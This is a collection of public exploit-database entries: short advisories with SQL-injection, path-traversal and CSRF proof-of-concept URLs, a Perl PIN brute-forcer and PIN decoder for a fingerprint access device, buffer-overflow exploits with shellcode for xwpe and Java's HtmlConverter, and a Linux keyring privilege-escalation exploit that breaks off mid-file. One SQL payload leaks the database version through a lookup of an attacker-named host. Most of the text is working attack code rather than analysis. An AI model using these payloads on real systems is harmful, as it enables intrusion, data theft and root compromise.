
source: https://www.securityfocus.com/bid/69422/info

Spider Video Player extension for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

An attacker may leverage this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Spider Video Player Extension 2.8.3 is vulnerable; other versions may also be affected. 

http://www.example.com/component/spidervideoplayer/?view=settings&format=row&typeselect=0&playlist=1,&theme=1' 
            
source: https://www.securityfocus.com/bid/69390/info
 
Grand MA 300 is prone to multiple security weaknesses.
 
Attackers can exploit these issues to disclose the access PIN by sniffing network traffic, or to brute-force the PIN and gain unauthorized access. This may aid in other attacks.
 
Grand MA 300 running firmware version 6.60 is vulnerable. 

#!/usr/bin/perl
#
# This brute-forces the pin of a Grand MA 300 Fingerprint
# Access device in less than 5 minutes, if the pin
# is between 1 and 4294967296.
#
# written by Eric Sesterhenn <eric.sesterhenn () lsexperts de>
# http://www.lsexperts.de
#
use IO::Socket::INET;
use strict;
use warnings;

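# Render a byte string as upper-case hexadecimal, two digits per byte.
#
# Argument: $data - the string to dump (undef is treated as empty).
# Returns:  the hex string, e.g. "\x0A\x01" becomes "0A01".
#
# Each byte is zero-padded to two digits. Without the padding a byte below
# 0x10 would print as a single digit, and the dump could no longer be split
# back into bytes unambiguously.
sub hexd {
        my ($data) = @_;
        return "" unless defined $data;

        return join "", map { sprintf "%02X", ord($_) } split //, $data;
}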
# Read an unsigned 16-bit little-endian word from $data at byte $offset.
#
# Arguments: $data   - byte string to read from
#            $offset - index of the low-order byte
# Returns:   low byte + 256 * high byte.
sub getword {
        my ($data, $offset) = @_;

        # Low-order byte comes first on the wire, high-order byte second.
        my $low  = ord(substr($data, $offset, 1));
        my $high = ord(substr($data, $offset + 1, 1));

        return $low + 0x100 * $high;
}

# Serialise the low 16 bits of $value as two bytes, low-order byte first.
#
# Argument: $value - integer; bits above the 16th are discarded.
# Returns:  a two-character byte string.
sub makeword {
        my ($value) = @_;

        my $low_byte  = $value & 0xFF;
        my $high_byte = ($value >> 8) & 0xFF;

        return join "", chr($low_byte), chr($high_byte);
}

# Compute the 16-bit checksum the protocol carries in bytes 2-3 of a packet.
#
# Argument: $packet - the full packet, with any value in the checksum field.
# Returns:  the one's-complement of the folded 16-bit word sum.
#
# This is a plain additive checksum: it detects transmission errors but
# gives no integrity protection against anyone who can craft a packet.
sub calccrc {
        my ($packet) = @_;

        # Leave the checksum field (bytes 2-3) out of the sum and append one
        # zero byte so a packet of odd length still ends on a whole word.
        my $summed = substr($packet, 0, 2) . substr($packet, 4) . chr(0);

        # Add up every little-endian 16-bit word.
        my $sum   = 0;
        my $limit = length($packet) - 2;
        my $pos   = 0;
        while ($pos < $limit) {
                $sum += getword($summed, $pos);
                $pos += 2;
        }

        # Fold anything above 16 bits back into the low 16 bits.
        $sum = ($sum & 0xFFFF) + ($sum >> 0x10) while $sum > 0xFFFF;

        # Invert and keep 16 bits.
        return ~$sum & 0xFFFF;
}

# Build one protocol packet: type, checksum, connection id, sequence number
# (each a 16-bit little-endian word) followed by the payload bytes.
#
# Arguments: $type, $cid, $seqno - header fields; $data - payload string.
# Returns:   the packet as a byte string.
sub makepacket {
        my ($type, $cid, $seqno, $data) = @_;

        # Everything after the checksum field is identical in both passes.
        my $tail = makeword($cid) . makeword($seqno) . $data;

        # First pass with a zero checksum field, then insert the real value.
        my $crc = calccrc(makeword($type) . makeword(0) . $tail);

        return makeword($type) . makeword($crc) . $tail;
}

# Encode a candidate PIN into the 32-bit value carried in the 1102 request.
#
# Arguments: $pin - candidate PIN (integer)
#            $cid - connection id taken from the device's reply
# Returns:   the encoded integer.
#
# Every step below is keyless and reversible (bit reversal, addition of the
# connection id, XOR with a fixed constant, word swap). The encoding hides
# the PIN from a casual look at the traffic; it is not encryption.
sub calcpass {
        my ($pin, $cid) = @_;
        my $ret = 0;

        # reverse the order of the 32 bits
        for (my $i = 0; $i < 32; $i++) {
          $ret *= 2;
          if ($pin & 1) {
            $ret = $ret + 1;
          }
          # floating-point halving; the bitwise & above only looks at the
          # integer part, so this acts as a right shift for non-negative pins
          $pin = $pin / 2;
        }

        $ret += $cid;

        # xor with magic value
        $ret ^= 0x4F534B5A;

        # switch the words
        $ret = (($ret & 0xFFFF) << 16) + ($ret >> 16);

        # xor all, but third byte with last byte of gettickcount
        # ($gc is fixed at 0 in this script, so this XOR changes nothing)
        my $gc = 0x00;
        $ret ^= $gc + ($gc << 8) + ($gc << 24);

        # set third byte to last byte of gettickcount
        # this weakens the algorithm even further, since this byte
        # is no longer relevant to the algorithm
        $ret = ($ret & 0xFF000000) + ($gc << 16) + ($ret & 0xFFFF);
        
        return $ret;
}

# flush after every write
local $| = 1;

my ($socket,$client_socket);

# Create an IO::Socket::INET object for the device's management port.
# Note that Proto is 'udp': there is no TCP connection here, the socket is
# only associated with the peer address and each send/recv is one datagram.

my $data;
$socket = new IO::Socket::INET (
        PeerHost => '192.168.1.201',    # CHANGEME
        PeerPort => '4370',
        Proto => 'udp',
) or die "ERROR in Socket Creation : $!\n";

# initialize the connection (command 1000, connection id 0, sequence 0)
$socket->send(makepacket(1000, 0, 0, ""));
$socket->recv($data, 1024);

# word 0 of the reply is the response type, the word at byte 4 is the
# connection id the device assigned
my $typ = getword($data, 0);
my $cid = getword($data, 4);
# the script treats any reply other than 2005 as "no PIN configured"
if ($typ != 2005) {
        printf("Client does not need a password");
        exit(-1);
}

# One request/response pair per candidate: command 1102 with the encoded
# candidate, reply type 2000 is taken as "accepted".
# NOTE(review): the header comment speaks of PINs up to 4294967296 while this
# loop tries 65536 candidates; the file does not explain how the two relate.
# Defensive reading: nothing in this exchange shows a lockout, delay or
# attempt counter on the device side, which is what makes the search cheap.
# Restricting who can reach UDP port 4370 and alerting on bursts of 1102
# requests from one source are the controls this traffic pattern calls for.
for (my $i = 0; $i < 65536; $i++) {
        if (($i % 10) == 0) { printf "$i\n"; }
        my $pass = calcpass($i, $cid);
        $socket->send(makepacket(1102, $cid, $i + 1, pack("V", $pass)));

        $socket->recv($data, 1024);
        $typ = getword($data, 0);
        if ($typ == 2000) {
                printf("Found pin: %d\n", $i);
                exit(0);
        }
}

# disconnect (command 1001); only reached when no candidate was accepted
$socket->send(makepacket(1001, $cid, 2, ""));

$socket->close();
            
source: https://www.securityfocus.com/bid/69390/info

Grand MA 300 is prone to multiple security weaknesses.

Attackers can exploit these issues to disclose the access PIN by sniffing network traffic, or to brute-force the PIN and gain unauthorized access. This may aid in other attacks.

Grand MA 300 running firmware version 6.60 is vulnerable. 

#!/usr/bin/perl
#
# This script calculates the original pin based on the pin
# retrieved on the wire for the Grand MA 300 fingerprint access device
#
# look for a UDP packet starting with 0x4E 0x04, the last 4 bytes are the
# encoded pin
#
# written by Eric Sesterhenn <eric.sesterhenn () lsexperts de>
# http://www.lsexperts.de
#
use warnings;
use strict;

# Sample inputs hard-coded by the author: the connection id of the session
# and the 32-bit encoded PIN as captured from the authentication packet.
# The steps below undo the device's encoding in reverse order. None of them
# needs a secret, so one captured authentication packet exposes the PIN;
# treat the PIN as disclosed on any segment where this traffic is visible.
my $cid = 0;     # connection id
my $ret = 0x4B00A987; # pin on the wire

# get gettickcount value (third byte)
my $gc = ($ret >> 16) & 0xFF;

# OR the constant 0x5A into the third byte; the author's intent is that this
# byte cancels against the low byte of the magic value after the word swap
$ret =  $ret | 0x005A0000;

# xor all, but third byte with last byte of gettickcount
$ret ^= $gc + ($gc << 8) + ($gc << 24);

# switch the words
$ret = (($ret & 0xFFFF) << 16) + ($ret >> 16);

# xor with magic value
$ret ^= 0x4F534B5A;

# subtract the connection id
$ret -= $cid;

my $fin = 0;
# reverse the order of the 32 bits
for (my $i = 0; $i < 32; $i++) {
  $fin *= 2;
  if ($ret & 1) {
    $fin = $fin + 1;
  }
  # floating-point halving; the bitwise & above uses only the integer part
  $ret = $ret / 2;
}

# print the recovered value in hexadecimal
printf("final: %X \n", $fin);
            
source: https://www.securityfocus.com/bid/69387/info

The KenBurner Slider plugin for WordPress is prone to an arbitrary file-download vulnerability.

An attacker can exploit this issue to download arbitrary files from the web server and obtain potentially sensitive information. 

http://www.example.com/wp-admin/admin-ajax.php?action=kbslider_show_image&img=../wp-config.php 
            
source: https://www.securityfocus.com/bid/69386/info

MyAwards module for MyBB is prone to a cross-site request-forgery vulnerability.

An attacker may exploit this issue to perform certain unauthorized actions. This may lead to further attacks.

Versions prior to MyAwards 2.4 are vulnerable. 

https://www.example.com/forum/admin/index.php?module=user-awards&action=awards_delete_user&id=1&awid=1&awuid=2
https://www.example.com/forum/admin/index.php?module=user-awards&action=awards_delete_user&id=1&awuid=1 
            
source: https://www.securityfocus.com/bid/69307/info

ArticleFR is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

ArticleFR 3.0.4 is vulnerable; prior versions may also be affected. 

http://www.example.com/rate.php?act=get&id=0%20union%20select%201,(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHA R(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(1 11),CHAR(111),CHAR(98),CHAR(97),CHAR(114))))%20--%202 
            
source: https://www.securityfocus.com/bid/69303/info

ManageEngine Password Manager Pro and ManageEngine IT360 are prone to an SQL-injection vulnerability because they fail to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

The following products are affected:

ManageEngine Password Manager Pro 5 through 7 build 7003
ManageEngine IT360 8 through 10.1.1 build 10110 

www.example.com/MetadataServlet.dat?sv=[SQLi]
www.example.com/console/MetadataServlet.dat?sv=[SQLi]







>> Blind SQL injection in ManageEngine Desktop Central, Password Manager Pro and IT360 (including MSP versions)
>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security
==========================================================================
Disclosure: 19/08/2014 / Last updated: 05/02/2015

>> Background on the affected products:
"Desktop Central is an integrated desktop & mobile device management software that helps in managing the servers, laptops, desktops, smartphones and tablets from a central point. It automates your regular desktop management routines like installing patches, distributing software, managing your IT Assets, managing software licenses, monitoring software usage statistics, managing USB device usage, taking control of remote desktops, and more."

"Password Manager Pro is a secure vault for storing and managing shared sensitive information such as passwords, documents and digital identities of enterprises."

"Managing mission critical business applications is now made easy through ManageEngine IT360. With agentless monitoring methodology, monitor your applications, servers and databases with ease. Agentless monitoring of your business applications enables you high ROI and low TOC. With integrated network monitoring and bandwidth utilization, quickly troubleshoot any performance related issue with your network and assign issues automatically with ITIL based ServiceDesk integration."

These products have managed service providers (MSP) versions which are used to control the desktops and smartphones of several clients.
Quoting the author of the Internet Census 2012: "As a rule of thumb, if you believe that "nobody would connect that to the Internet, really nobody", there are at least 1000 people who did." 
These vulnerabilities can be abused to achieve remote code execution as SYSTEM in Windows or as the user in Linux. Needless to say, owning a Desktop Central / IT360 box will give you control of all the computers and smartphones it manages, while owning Password Manager Pro will give you a treasure trove of passwords.

>> Technical details:
The two blind SQL injections described below have been present in Desktop Central, Password Manager Pro and IT360 in all releases since 2006. They can only be triggered via a GET request, which means you can only inject around 8000 characters at a time.

#1 
Vulnerability: 
Blind SQL injection in LinkViewFetchServlet (unauthenticated on DC/PMP / authenticated on IT360)
CVE-2014-3996

Affected products / versions:
- ManageEngine Desktop Central (DC) [MSP]: all versions from v4 up to v9 build 90033
- ManageEngine Password Manager Pro (PMP) [MSP]: all versions from v5 to version 7 build 7002
- ManageEngine IT360 [MSP]: all versions from v8 to v10.1.1 build 10110
This affects all versions of the products released since 19-Apr-2006. Other ManageEngine products might be affected.
Fix: Upgrade to DC v9 build 90043; PMP v7 build 7003; IT360 v10.3.3 build 10330

Constraints: 
- DC: no authentication or any other information needed
- PMP: no authentication or any other information needed
- IT360: valid user account needed

Proof of concept:

DC / PMP:
GET /LinkViewFetchServlet.dat?sv=[SQLi]

IT360:
GET /console/LinkViewFetchServlet.dat?sv=[SQLi]


#2
Vulnerability: 
Blind SQL injection in MetadataServlet (unauthenticated on PMP / authenticated on IT360) 
CVE-2014-3997

Affected products / versions:
- ManageEngine Password Manager Pro (PMP) [MSP]: all versions from v5 to version 7 build 7002
- ManageEngine IT360 [MSP]: all versions from v8 to v10.1.1 build 10110
This affects all versions of the products released since 03-Apr-2008. Other ManageEngine products might be affected.
Fix: Upgrade to DC v9 build 90043; PMP v7 build 7003; IT360 v10.3.3 build 10330

Constraints: 
- PMP: no authentication or any other information needed
- IT360: valid user account needed

Proof of concept:

PMP:
GET /MetadataServlet.dat?sv=[SQLi]

IT360:
GET /console/MetadataServlet.dat?sv=[SQLi]

================
Agile Information Security Limited
http://www.agileinfosec.co.uk/
>> Enabling secure digital business >>
            
source: https://www.securityfocus.com/bid/69278/info

WP Content Source Control plugin for WordPress is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input.

Exploiting this issue can allow an attacker to obtain sensitive information that could aid in further attacks.

WP Content Source Control 3.0.0 is vulnerable; other versions may also be affected. 

www.example.com/wp-content/plugins/wp-source-control/downloadfiles/download.php?path=../../../../wp-config.php 
            
# Exploit Author: Juan Sacco - http://www.exploitpack.com <jsacco@exploitpack.com>
# Program: xwpe - Windows Editor v1.5.30a-2.1
# Description: Programming environment and editor for console and X11
# Tested and developed on:  Kali Linux 2.0 x86 - https://www.kali.org
#
# Description: xwpe v1.5.30a-2.1 and prior is prone to a stack-based buffer
# overflow vulnerability because the application fails to perform adequate
# boundary-checks on user-supplied input.
#
# An attacker could exploit this issue to execute arbitrary code in the
# context of the application. Failed exploit attempts will result in a
# denial-of-service condition.
#
# Vendor homepage: http://www.identicalsoftware.com/xwpe
# Kali Linux 2.0 package: pool/main/x/xwpe/xwpe_1.5.30a-2.1_i386.deb
# MD5: 793a89f7df892c7934be6c2353a6f0f9
#
#gdb$ run $(python -c 'print "\x90" * 290  + "DCBA"')
#Starting program: /usr/bin/xwe $(python -c 'print "\x90" * 290  + "DCBA"')
#sh: 1: /usr/sbin/gpm: not found
#
#  ESI: 0x41414141  EDI: 0x41414141  EBP: 0x41414141  ESP: 0xBFFFF370  EIP: 0x42434441
#  CS: 0073  DS: 007B  ES: 007B  FS: 0000  GS: 0033  SS: 007B
#Error while running hook_stop:
#Cannot access memory at address 0x42434441
#0x42434441 in ?? ()
#gdb$ backtrace
#0  0x42434441 in ?? ()
#1  0x4f4e2041 in ?? ()
#2  0x61732054 in ?? ()
#3  0x21646576 in ?? ()
#4  0x206f440a in ?? ()
#5  0x20756f79 in ?? ()
#6  0x746e6177 in ?? ()
#7  0x206f7420 in ?? ()
#8  0x65766173 in ?? ()
#9  0x6c694620 in ?? ()
#10 0x003f2065 in ?? ()
#11 0x00000088 in ?? ()
#12 0x00000132 in ?? ()
#13 0x00000006 in ?? ()
#14 0x00002710 in ?? ()
#15 0x0000009a in ?? ()
#16 0xfac9bc00 in ?? ()
#17 0x00000098 in ?? ()
#18 0x00000011 in ?? ()
#19 0xb7f783d9 in _nc_wgetch () from /lib/i386-linux-gnu/libncurses.so.5
#20 0xb7f79162 in wgetch () from /lib/i386-linux-gnu/libncurses.so.5
#21 0x0809927d in ?? ()
#22 0x0806b23c in ?? ()
#23 0x08055c78 in ?? ()
#24 0x080565b5 in ?? ()iles  ESC-F3 Close W.  F4 Search  ^L S.Again  ESC-X
Quit

#25 0x080574aa in ?? ()
#26 0x0804b8b8 in ?? ()
#27 0xb7ddca63 in __libc_start_main (main=0x804b570, argc=0x2,
argv=0xbffff664, init=0x809a060, fini=0x809a050, rtld_fini=0xb7fedc90
<_dl_fini>, stack_end=0xbffff65c) at libc-start.c:287
#28 0x08049ea1 in ?? ()

import os,subprocess
def run():
  """Launch xwpe with an over-long argument built from the pieces below.

  The argument is junk + shellcode + nops + eip, passed as a list to
  subprocess.call (no shell involved). An OSError from the launch is
  reported and then re-raised.
  """
  try:
    print "# xwpe Buffer Overflow by Juan Sacco"
    print "# It's AGAIN Fuzzing time on unusable exploits"
    print "# This exploit is for educational purposes only"
    # JUNK + SHELLCODE + NOPS + EIP

    junk = "\x41"*262
    shellcode = "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
    nops = "\x90"*124
    # Fixed little-endian address 0xbfffd150, i.e. a location on the stack.
    # NOTE(review): a hard-coded stack address only works where the stack is
    # both executable and at a predictable address, so this presumably relies
    # on NX and ASLR being absent (the gdb session in the header would have
    # run with randomisation off by default) - confirm on the test system.
    eip = "\x50\xd1\xff\xbf"
    subprocess.call(["xwpe",' ', junk + shellcode + nops + eip])

  except OSError as e:
    # ENOENT means the xwpe binary was not found on PATH
    if e.errno == os.errno.ENOENT:
        print "Sorry, xwpe not found!"
    else:
        print "Error executing exploit"
    raise

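def howtousage():
  """Print a generic failure message and exit with status -1."""
  # The file's import line brings in os and subprocess only; without this
  # local import the sys.exit call below raises NameError instead of exiting.
  import sys
  print("Snap! Something went wrong")
  sys.exit(-1)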

# NOTE(review): nothing inside this try block indexes sys.argv or any other
# sequence, so the IndexError handler looks unreachable.
if __name__ == '__main__':
  try:
    print "Exploit xWPE Local Overflow Exploit"
    print "Author: Juan Sacco"
  except IndexError:
    howtousage()
# NOTE(review): run() sits outside the __main__ guard, so merely importing
# this file also launches xwpe with the crafted argument.
run()
            
[+] Credits: hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:
http://hyp3rlinx.altervista.org/advisories/ORACLE-HTMLCONVERTER-BUFFER-OVERFLOW.txt


Vendor:
===============
www.oracle.com


Product:
========================================
Java Platform SE 6 U24 HtmlConverter.exe
Product Version: 6.0.240.50


The HTML Converter is one of the Java SE binaries shipped with the JDK. It allows web
page authors to explicitly target
the browsers and platforms used in their environment when modifying their
pages.



Vulnerability Type:
============================
Buffer Overflow


CVE Reference:
==============
N/A



Vulnerability Details:
=====================

When htmlConverter.exe is called with a specially crafted payload, a buffer
overflow occurs that allows execution of arbitrary attacker-supplied code.
This was a small vulnerability; its fix was included as part of the overall
Oracle CPU (Critical Patch Update) released on January 19, 2016.

Reference:
http://www.oracle.com/technetwork/topics/security/cpujan2016-2367955.html



registers ...

EAX FFFFFFFE
ECX FFFFFFFE
EDX 0008E3C8
EBX 7EFDE000
ESP 0018FEB4
EBP 0018FF88
ESI 00001DB1
EDI 00000000
EIP 52525252                          <-------- "RRRR" \x52
C 0  ES 002B 32bit 0(FFFFFFFF)
P 0  CS 0023 32bit 0(FFFFFFFF)
A 1  SS 002B 32bit 0(FFFFFFFF)
Z 0  DS 002B 32bit 0(FFFFFFFF)
S 0  FS 0053 32bit 7EFDD000(FFF)
T 0  GS 002B 32bit 0(FFFFFFFF)
D 0



Exploit code(s):
===============

# NOTE(review): struct and subprocess are used below, but this excerpt shows
# no import lines for them.
###pgm="C:\\Oracle\\Middleware\\jdk160_24\\bin\\HtmlConverter.exe "
 #EIP @ 2493
# NOTE(review): "\jdk160_24" carries a single backslash, unlike the other
# path separators in this string.
pgm="C:\\Program Files (x86)\\Java\jdk160_24\\bin\\HtmlConverter.exe "
#EIP 2469 - 2479

#shellcode to pop calc.exe Windows 7 SP1
sc=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B"
"\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B"
"\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31"
"\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA"
"\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14"
"\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65"
"\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC")


#JMP ESP kernel32.dll
# An absolute address inside a system DLL: it is only meaningful for the one
# DLL build and load address the author tested, presumably the Windows 7 SP1
# system named in the shellcode comment above.
rp=struct.pack('<L', 0x76E72E2B)


# Layout: 2469 filler bytes, the 4-byte return address, 10 NOPs, shellcode.
# The whole string is handed over as one command-line argument, so the
# overflow is reached through local argument parsing. The advisory text on
# this page ties the issue to the Oracle CPU of January 19, 2016.
payload="A"*2469+rp+"\x90"*10+sc
subprocess.Popen([pgm, payload], shell=False)


Disclosure Timeline:
=====================================
Vendor Notification: August 28, 2015
January 20, 2016  : Public Disclosure



Exploitation Technique:
=======================
Local



Severity Level:
===============
Medium



Description:
=============================================================

Vulnerable Product:     [+] Java SE 6 U24 HtmlConverter.exe

=============================================================

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.

by hyp3rlinx
            
source: https://www.securityfocus.com/bid/69222/info

FB Gorilla plugin for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied input.

An attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

http://www.example.com/wp-content/plugins/fbgorilla/game_play.php?id=-7+/*!50000union*/+/*!50000select*/+1,2,%28/*!50000group_Concat%28user_login%29*/%29,4,5,6,7,8,9,0,1,2,3+from+wp_users-- 
            
source: https://www.securityfocus.com/bid/69181/info

The GB Gallery Slideshow plugin for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

An attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

GB Gallery Slideshow 1.5 is vulnerable; other versions may also be affected. 

POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
Accept-language: en-us,en;q=0.5
Accept-encoding: gzip,deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-agent: sqlmap/1.0-dev-5b2ded0 (http://sqlmap.org)
Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
Host: 10.0.0.67
Cookie: wordpress_75aacd302e2a4723897cb1d154c13f77=pippo%7C1407707530%7C5ae003a01e51c11e530c14f6149c9d07; wp-settings-time-1=1407537471; wp-settings-time-2=1406916594; wp-settings-1=editor%3Dtinymce%26libraryContent%3Dbrowse; voted_2=6; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_75aacd302e2a4723897cb1d154c13f77=pippo%7C1407707530%7C6988bc86de7b7790fca51ea294e171a1; redux_current_tab=3
Pragma: no-cache
Cache-control: no-cache,no-store
Content-type: application/x-www-form-urlencoded; charset=utf-8
Content-length: 120
Connection: close

action=gb_ajax_get_group&gb_nonce=5356513fbe&selected_group=[SQL_Injection]


Exploit via sqlmap:

sqlmap --cookie='INSERT_WORDPRESS_COOKIE_HERE' -u "http://www.example.com/wp-admin/admin-ajax.php" \
--data="action=gb_ajax_get_group&gb_nonce=5356513fbe&selected_group=2" -p selected_group --dbms=mysql 

---
Place: POST
Parameter: selected_group
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: action=gb_ajax_get_group&gb_nonce=5356513fbe&selected_group=2 AND SLEEP(5)
    Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
---
            
source: https://www.securityfocus.com/bid/69109/info

VoipSwitch is prone to a local file-include vulnerability because it fails to sufficiently sanitize user-supplied input.

An attacker can exploit this vulnerability to view files and execute local scripts in the context of the web server process. This may aid in further attacks. 

https://www.example.com/user.php?action=../../../windows/win.ini%00.jpg 
            
source: https://www.securityfocus.com/bid/69105/info

The WordPress HDW Player plugin (Video Player & Video Gallery) is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

An attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

HDW Player 2.4.2 is vulnerable; other versions may also be affected. 

http://www.example.com/wp-admin/admin.php?page=videos&opt=edit&id=2 union select 1,2,user(),4,5,6,database(),8,@@version,10,11,12 
            
source: https://www.securityfocus.com/bid/69089/info

The WordPress Spreadsheet plugin (wpSS) is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

An attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

wpSS 0.62 is vulnerable; other versions may also be affected. 

http://www.example.com/wordpress/wp-content/plugins/wpSS/ss_handler.php?ss_id=-20%20UNION%20ALL%20SELECT%201,2,3,4# 
            
source: https://www.securityfocus.com/bid/69028/info

Barracuda Web Application Firewall is prone to an authentication-bypass vulnerability.

An attacker can exploit this issue to bypass the authentication mechanism and gain access to the appliance. This may aid in further attacks.

Barracuda Web Application Firewall 7.8.1.013 is vulnerable; other versions may also be affected. 

http://www.example.com/cgi-mod/index.cgi?auth_type=Local&et=99999999996locale=en_US&password=5a2fd48b65c5d80881eeb0f738bcc6dc&primary_tab=SECURITY%20POLICIES&secondary_tab=request_limits&user=guest 
            
/*
# Exploit Title: Linux kernel REFCOUNT overflow/Use-After-Free in keyrings
# Date: 19/1/2016
# Exploit Author: Perception Point Team
# CVE : CVE-2016-0728
*/

/* $ gcc cve_2016_0728.c -o cve_2016_0728 -lkeyutils -Wall */
/* $ ./cve_2016_072 PP_KEY */

/* EDB-Note: More information ~ http://perception-point.io/2016/01/14/analysis-and-exploitation-of-a-linux-kernel-vulnerability-cve-2016-0728/ */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <keyutils.h>
#include <unistd.h>
#include <time.h>
#include <unistd.h>

#include <sys/ipc.h>
#include <sys/msg.h>

/*
 * Function-pointer types and globals for two kernel routines. main() fills
 * the pointers from the constants below; userspace_revoke() calls through
 * them.
 */
typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
_commit_creds commit_creds;
_prepare_kernel_cred prepare_kernel_cred;

/* Size of the message text sent with msgsnd() in main(): 0xb8 - 0x30 bytes. */
#define STRUCT_LEN (0xb8 - 0x30)
/*
 * Absolute kernel addresses fixed at compile time.
 * NOTE(review): values like these match one specific kernel build only; on
 * any other build, or with kernel address randomisation, they would not
 * point at the named symbols - confirm against the target's symbol table.
 */
#define COMMIT_CREDS_ADDR (0xffffffff81094250)
#define PREPARE_KERNEL_CREDS_ADDR (0xffffffff81094550)



/*
 * User-space structure made of a name, a length and a table of untyped
 * pointers. main() allocates one, sets only `revoke`, and stores the
 * structure's address in the crafted message at the offset its own comment
 * labels key->type.
 * NOTE(review): the field order presumably mirrors the kernel's own
 * struct key_type for the targeted version - confirm against that source.
 */
struct key_type {
    char * name;
    size_t datalen;
    void * vet_description;
    void * preparse;
    void * free_preparse;
    void * instantiate;
    void * update;
    void * match_preparse;
    void * match_free;
    void * revoke;  /* the only member main() assigns */
    void * destroy;
};

/*
 * Calls prepare_kernel_cred(0) and passes the result to commit_creds(), both
 * through the global pointers main() initialises. The `key` argument is not
 * used. main() installs this function as the `revoke` member of its
 * key_type structure and, per its own comment, expects the kernel to call it.
 * This is ordinary user-space code at a user-space address; hardware
 * controls that stop the kernel from executing user pages (SMEP) are aimed
 * at exactly this kind of call.
 */
void userspace_revoke(void * key) {
    commit_creds(prepare_kernel_cred(0));
}

/*
 * Entry point. Takes exactly one argument, the name of the session keyring
 * to join. Stages, in order: build a crafted System V message, join the
 * named keyring and open its permissions, repeat the join close to 2^32
 * times, fork 64 children that each queue 64 copies of the message, revoke
 * the session keyring, print uid/euid again and exec /bin/sh.
 * Returns 1 on bad usage and -1 when a keyctl() or fork() call fails.
 */
int main(int argc, const char *argv[]) {
	const char *keyring_name;
	size_t i = 0;
    unsigned long int l = 0x100000000/2;
	key_serial_t serial = -1;
	pid_t pid = -1;
    struct key_type * my_key_type = NULL;
    
/* message sent later with msgsnd(): an mtype plus STRUCT_LEN bytes of text */
struct { long mtype;
		char mtext[STRUCT_LEN];
	} msg = {0x4141414141414141, {0}};
	int msqid;

	if (argc != 2) {
		puts("usage: ./keys <key_name>");
		return 1;
	}

    printf("uid=%d, euid=%d\n", getuid(), geteuid()); 
    /* point the two global function pointers at the hard-coded addresses */
    commit_creds = (_commit_creds) COMMIT_CREDS_ADDR;
    prepare_kernel_cred = (_prepare_kernel_cred) PREPARE_KERNEL_CREDS_ADDR;
    
    /* NOTE(review): the malloc() result is used without a NULL check */
    my_key_type = malloc(sizeof(*my_key_type));

    my_key_type->revoke = (void*)userspace_revoke;
    /* fill the text with 'A', then patch three fields at fixed offsets */
    memset(msg.mtext, 'A', sizeof(msg.mtext));

    // key->uid
    *(int*)(&msg.mtext[56]) = 0x3e8; /* geteuid() */
    //key->perm
    *(int*)(&msg.mtext[64]) = 0x3f3f3f3f;

    //key->type
    *(unsigned long *)(&msg.mtext[80]) = (unsigned long)my_key_type;

    if ((msqid = msgget(IPC_PRIVATE, 0644 | IPC_CREAT)) == -1) {
        perror("msgget");
        exit(1);
    }

    keyring_name = argv[1];

	/* Set the new session keyring before we start */

	serial = keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name);
	if (serial < 0) {
		perror("keyctl");
		return -1;
    }
	
	if (keyctl(KEYCTL_SETPERM, serial, KEY_POS_ALL | KEY_USR_ALL | KEY_GRP_ALL | KEY_OTH_ALL) < 0) {
		perror("keyctl");
		return -1;
	}


	/*
